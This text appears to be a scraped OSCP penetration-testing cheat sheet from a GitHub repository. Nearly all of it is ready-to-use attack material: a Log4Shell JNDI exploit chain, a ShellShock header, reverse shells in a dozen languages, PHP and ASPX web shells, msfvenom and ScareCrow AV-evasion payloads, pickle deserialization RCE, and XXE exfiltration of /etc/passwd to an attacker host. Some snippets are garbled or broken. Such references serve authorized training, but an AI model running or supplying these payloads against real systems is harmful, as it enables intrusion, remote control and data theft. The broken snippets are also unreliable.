mvn clean package -DskipTests

Exploit.java

public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash <LHOST> <LPORT>");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Compiling Exploit.java

javac Exploit.java -source 8 -target 8

Start Pyhton3 HTTP Server

python3 -m http.server 80

Starting the malicious LDAP Server

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<LHOST>:80/#Exploit"

Start local netcat listener

nc -lnvp 9001

Execute the Payload

curl 'http://<RHOST>:8983/solr/admin/cores?foo=$\{jndi:ldap://<LHOST>:1389/Exploit\}'

SharpEfsPotato

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "C:\nc64.exe -e cmd.exe <LHOST> <LPORT>"

ShellShock

curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' http://<RHOST>/cgi-bin/user.sh

Shocker

https://raw.githubusercontent.com/gabrtv/shocker/master/shocker.c

        // get a FS reference from something mounted in from outside
        if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
                die("[-] open");

        if (find_handle(fd1, "/root/root.txt", &root_h, &h) <= 0)
                die("[-] Cannot find valid handle!");

gcc shocker.c -o shocker
cc -Wall -std=c99 -O2 shocker.c -static

Payloads

Donut

donut -a 2 -f 1 -o donutpayload.bin shellcode.exe

Exiftool

PHP into JPG Injection

exiftool -Comment='<?php passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f"); ?>' shell.jpg
exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' <FILE>.jpeg
exiftool "-comment<=back.php" back.png
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' <FILE>.png

GhostScript

%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cat flag > /app/application/static/petpets/flag.txt) currentdevice putdeviceprops

Reverse Shells

Bash Reverse Shell

bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
echo -n '/bin/bash -c "bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"' | base64

curl Reverse Shell

curl --header "Content-Type: application/json" --request POST http://<RHOST>:<RPORT>/upload --data '{"auth": {"name": "<USERNAME>", "password": "<PASSWORD>"}, "filename" : "& echo "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"|base64 -d|bash"}'

JAVA Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();

shell.jar

package <NAME>;

import org.bukkit.plugin.java.JavaPlugin;

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;

public class Main extends JavaPlugin {
   @Override
   public void onDisable() {
     super.onDisable();
   }

@Override
public void onEnable() {
  final String PHP_CODE = "<?php system($_GET['cmd']); ?>";
  try {
   Files.write(Paths.get("/var/www/<RHOST>/shell.php"), PHP_CODE.getBytes(), StandardOpenOption.CREATE_NEW);
   } catch (IOException e) {
     e.printStackTrace();
   }

   super.onEnable();
  }
}

Lua Reverse Shell

http://<RHOST>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT>/tmp/f")--

Markdown Reverse Shell

--';bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1;'--

mkfifo Reverse Shell

mkfifo /tmp/shell; nc <LHOST> <LPORT> 0</tmp/shell | /bin/sh >/tmp/shell 2>&1; rm /tmp/shell

Netcat Reverse Shell

nc -e /bin/sh <LHOST> <LPORT>

Perl Reverse Shell

perl -e 'use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP Reverse Shell

php -r '$sock=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");'

PowerShell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell -nop -exec bypass -c '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

minireverse.ps1

$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
	$writer.Flush();
	$read = $null;
	$res = ""
	while($stream.DataAvailable -or $read -eq $null) {
		$read = $stream.Read($buffer, 0, 1024)
	}
	$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
	if(!$out.equals("exit")){
		$args = "";
		if($out.IndexOf(' ') -gt -1){
			$args = $out.substring($out.IndexOf(' ')+1);
			$out = $out.substring(0,$out.IndexOf(' '));
			if($args.split(' ').length -gt 1){
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "cmd.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.Arguments = "/c $out $args"
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null
                $p.WaitForExit()
                $stdout = $p.StandardOutput.ReadToEnd()
                $stderr = $p.StandardError.ReadToEnd()
                if ($p.ExitCode -ne 0) {
                    $res = $stderr
                } else {
                    $res = $stdout
                }
			}
			else{
				$res = (&"$out" "$args") | out-string;
			}
		}
		else{
			$res = (&"$out") | out-string;
		}
		if($res -ne $null){
        $writer.WriteLine($res)
    }
	}
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);'

echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > <FILE><(),2);p=subprocess.call(["/bin/sh","-i"]);' > <FILE>

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("<LHOST>",<LPORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Web Shells

PHP Web Shell

<?php system($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php echo passthru($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
<?php echo system($_REQUEST['shell']): ?>

nishang

cd path/to/nishang/Shells/
cp Invoke-PowerShellTcp.ps1 Invoke-PowerShellTcp.ps1

tail -3 Invoke-PowerShellTcp.ps1
}

Invoke-PowerShellTcp -Reverse -IPAddress <LHOST> -Port <LPORT>

powershell "IEX(New-Object Net.Webclient).downloadString('http://<LHOST>:<LPORT>/Invoke-PowerShellTcp.ps1')"

ScareCrow

Payloads

Shellcode Payload Creation with msfvenom

msfvenom -a x64 -p windows/x64/meterpreter/reverse_https LHOST=<LHOST> LPORT=8443 -f raw -o <FILE>.bin

.msi-File Payload Creation with msfvenom

msfvenom -a x64 -p windows/x64/meterpreter/reverse_https LHOST=<LHOST> LPORT=8443 -f exe -o <FILE>.exe

Listener

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_https

Obfuscation

DLL Side-Loading

ScareCrow -I <FILE>.bin -Loader dll -domain <FAKE_DOMAIN>

Windows Script Host

ScareCrow -I <FILE>.bin -Loader msiexec -domain <FAKE_DOMAIN> -O payload.js

Control Panel Files

ScareCrow -I <FILE>.bin -Loader control -domain <FAKE_DOMAIN>

Renaming Payload

mv <FILE>.dll <FILE>32.dll

Execution

rundll32.exe .\<FILE>32.dll,DllRegisterServer

or

regsvr32 /s .\<FILE>32.dll

For .cpl-Files a simple double click is enough to execute them.

Shikata Ga Nai

msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/shell.exe

ysoserial

java -jar ysoserial-master-SNAPSHOT.jar
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections1 'nc <LHOST> <LPORT> -e /bin/sh' | base64 -w 0
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections4 "$jex" > /tmp/$filename.session

Templates

ASPX Web Shell

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->

Bad YAML

- hosts: localhost
  tasks:
    - name: badyml
      command: chmod +s /bin/bash

Exploit Skeleton Python Script

#!/usr/bin/python

import socket,sys

address = '127.0.0.1'
port = 9999
buffer = #TBD

try:
	print '[+] Sending buffer'
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((address,port))
	s.recv(1024)
	s.send(buffer + '\r\n')
except:
 	print '[!] Unable to connect to the application.'
 	sys.exit(0)
finally:
	s.close()

JSON POST Request

POST /<path> HTTP/1.1
Host: <RHOST>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 95
Connection: close

{
  "auth":{
    "name":"<USERNAME>",
    "password":"<PASSWORD>"
  },
  "filename":"<FILE>"
}

Python Pickle RCE

import pickle
import sys
import base64

command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat <LHOST> <LHOST> > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))

print(base64.b64encode(pickle.dumps(rce())))

import base64
import pickle
import os

class RCE:
	def __reduce__(self):
		cmd = ("/bin/bash -c 'exec bash -i &>/dev/tcp/<LHOST>/<LPORT> <&1'")
		return = os.system, (cmd, )

if __name__ == '__main__':
	pickle = pickle.dumps(RCE())
	print(bas64.b64encode(pickled))

Python Redirect for SSRF

#!/usr/bin/python3
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

class Redirect(BaseHTTPRequestHandler):
  def do_GET(self):
      self.send_response(302)
      self.send_header('Location', sys.argv[1])
      self.end_headers()

HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()

sudo python3 redirect.py http://127.0.0.1:3000/

#!/usr/bin/env python

import SimpleHTTPServer
import SocketServer
import sys
import argparse

def redirect_handler_factory(url):
    """
    returns a request handler class that redirects to supplied `url`
    """
    class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
       def do_GET(self):
           self.send_response(301)
           self.send_header('Location', url)
           self.end_headers()

       def do_POST(self):
           self.send_response(301)
           self.send_header('Location', url)
           self.end_headers()

    return RedirectHandler


def main():

    parser = argparse.ArgumentParser(description='HTTP redirect server')

    parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')
    parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')
    parser.add_argument('redirect_url', action="store")

    myargs = parser.parse_args()

    redirect_url = myargs.redirect_url
    port = myargs.port
    host = myargs.ip

    redirectHandler = redirect_handler_factory(redirect_url)

    handler = SocketServer.TCPServer((host, port), redirectHandler)
    print("serving at port %s" % port)
    handler.serve_forever()

if __name__ == "__main__":
    main()

Python Web Request

import requests
import re

http_proxy  = "http://127.0.0.1:8080"
proxyDict = {
              "http"  : http_proxy,
            }
// get a session
r = requests.get('http://')
// send request
r = requests.post('<RHOST>', data={'key': 'value'}, cookies={'PHPSESSID': r.cookies['PHPSESSID']} , proxies=proxyDict)

XML External Entity (XXE)

Request

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % <NAME> SYSTEM 
"http://<LHOST>/<FILE>.dtd">%<NAME>;]>
<root>
<method>GET</method>
<uri>/</uri>
<user>
<username><NAME>;</username>
<password><NAME></password>
</user>
</root>

Content of .dtd

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://<LHOST>/?f=%file;'>">
%eval;
%exfiltrate;

Name		Name	Last commit message	Last commit date
Latest commit History 99 Commits
.github		.github
files		files
CODE-OF-CONDUCT.md		CODE-OF-CONDUCT.md
LICENSE.md		LICENSE.md
README.md		README.md

Name	URL
Chisel	https://github.com/jpillora/chisel
Swaks	https://github.com/jetmore/swaks
CyberChef	https://gchq.github.io/CyberChef

License

cisp-pte/OSCP

Folders and files

Latest commit

History

Repository files navigation

OSCP Cheat Sheet

Table of Contents

Basics

Information Gathering

Vulnerability Analysis

Web Application Analysis

Password Attacks

Reverse Engineering

Exploitation Tools

Post Exploitation

CVEs

Exploiting

Payloads

Wordlists

Social Media Resources

Commands

Basics

CentOS

curl

Chisel

Reverse Pivot

SOCKS5 / Proxychains Configuration

dir

Environment Variables

File Transfer

Certutil

Netcat

Impacket

Bash only

wget version

curl version

gcc

getfacl

Kerberos

PHP Webserver

Ping

Python Webserver

RDP

showmount

smbclient

Download multiple files at once

socat

SSH

Time and Date

Get the Server Time

Stop virtualbox-guest-utils to stop syncing Time

Disable automatic Sync

Options to set the Date and Time

Keep in Sync with a Server

tmux

Upgrading Shells

vi

VirtualBox

virtualenv

Windows Command Formatting

Information Gathering

Nmap

BloodHound

Installing and starting Database

BloodHound Python

Certify

enum4linux-ng

ldapsearch

memcached

NetBIOS

rpclient

snmpwalk

Web Application Analysis

Burp Suite

ffuf

API Fuzzing

Looging for LFI

Fuzzing with PHP Session ID

Recursion